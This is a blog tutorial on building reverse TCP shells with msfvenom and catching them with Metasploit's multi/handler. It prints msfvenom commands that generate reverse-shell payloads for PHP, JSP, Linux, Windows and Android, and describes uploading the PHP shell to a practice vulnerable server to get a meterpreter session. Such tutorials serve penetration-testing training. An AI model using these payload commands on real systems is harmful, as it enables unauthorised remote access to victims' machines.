Reverse TCP shell with Metasploit

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Mar 23, 2020

Metasploit is an awesome tool. It can be used to automate the exploitation process , generate shell codes , use as a listener etc. I hope to start a tutorial serious on metasploit framework and it's partner programs. So in today tutorial we are going to see how we can build a reverse tcp shell with metasploit. As an example we use msfvenom for create a web shell in PHP and use Metasploit to get the session. It can create a reverse TCP connection to our mashing.

Reverse TCP vs Bind TCP shell

First of all let's clear what is a reverse tcp shell, What's a bind shell and how they work. In both of these situations there is a Attacker mashing and a victim server. In a reverse shell a we open a connection from victim server to attacker's mashing. We setup a listener on the attacker's mashing. It waits for an incoming connection from the victim. When it receives the tcp connection it serve us a shell to access the victim server.

A bind shell works in a different way. Payload will bind a shell to a specific port on the victim server. So attacker can use his mashing to connect back to victim server.

Generating the exploit using Msfvenom

first we use msfvenom for create our shell. This tool is packed with metasploit framework and can be used to generate exploits for multi platforms such as Android, Windows, PHP servers etc.

Following is the syntax for generate a exploit with msfvenom.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

Hear we have supplied many arguments to msfvenom tool. Let's see what they do. At the moment we don't use any encoding . In later we can use them.

Hear -p stands for payload. It tells which payload we want to use. Hear we used meterpreter as the payload. You can get the list of available payloads by using the command msfvenom --list payloads. In above example we used a php payload since we are going to build a Web shell.

-o This is output format. We have specified shell.php. So our output file will be saved as shell.php.

In following list we can see some payload types we use often.

Web servers

Most Web servers run PHP as there server side language. We can build a PHP web shell with MSFvenom by using "php/meterpreter_reverse_tcp" as the payload. Since we are uploading it to a PHP server the extension of the shell should be "PHP".

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

What about a JSP server. We can build a web shell as a jsp file and try to upload it. So we want to use "java/jsp_shell_reverse_tcp" as our payload and the output file type should be ".jsp".

msfvenom -p java/jsp_shell_reverse_tcp -o shell.jsp LHOST= LPORT=555

Linux platforms

If we want to attack a Linux server we can use "linux/x86/meterpreter/reverse_tcp" as our payload. Also we an use ".elf" as the output file.

msfvenom -p linux/x86/meterpreter/reverse_tcp -o shell.elf LHOST= LPORT=555

Windows mashings

For Windows, we can use meterpreter as the payload. So we should select "windows/meterpreter/reverse_tcp". As you know the extension should be ".exe".

msfvenom -p windows/meterpreter/reverse_tcp -o shell.exe LHOST= LPORT=555

Android devices

We know that Android is the world most popular mobile operating system. Metasploit has various payloads for Android. vCommonly we use "android/meterpreter_reverse_tcp" to attack Android devices. The output file type should be ".APK".

msfvenom -p android/meterpreter_reverse_tcp -o shell.apk LHOST= LPORT=555

LHOST is the IP of attacker mashing. It should be our public IP. Because a revers shell is connected from victim mashing to our mashing.

LPORT is any opened port on our mashing.

You can see we have generated our shell as a php file. Now we can use any method like RFI , FUV etc to upload this to a server. I'll use web for pentester vulnerable mashing. Before we execute our shell we want to set a listener for catch our connection.

Now we start metasploit framework. There are number of options to use metasploit like msfcli, msfweb interface , armitage , msfconsole etc. In many times we use msfconsole for this.

Yes , a beautiful interface. This is an interactive shell and we can use it easily. First we want to set a handler for our connection. Handler is responsible for handle reverse connection. Hear we have used multi/handler . You can set it with use exploit command.

Now we have to set some extra options. Any time in msfconsole you can find which options you want to set by entering the command show options .

In above pic we can see we need to set LHOST and LPORT. Let's set them. Both of them are same as what we used in generating our shell.

OK now is the time to attack. We use command run to start the process.

It is waiting for an incoming connection. Now we can execute our shell on web server.

Yes. It worked. we got our metepreter shell. Now we can do many things. I'll post another tutorial on meterpreter. Till then you can see what to do with command help . :-)

Hi, I'm Thilan. An engineering student from SriLanka. I love to code with Python, JavaScript PHP and C.

Also read

Aug 12
Variables | Python programming

You know that variable is a memory space ant it contains a value. When we talk in low level that's....

Oct 17
Reverse engineering example

So you want to learn Reverse engineering. That's great. RE is used in various topics such as....

Aug 12
Modules | Python programming

Module is a simple but powerful concept in python. We saw in C programs we used header files. (....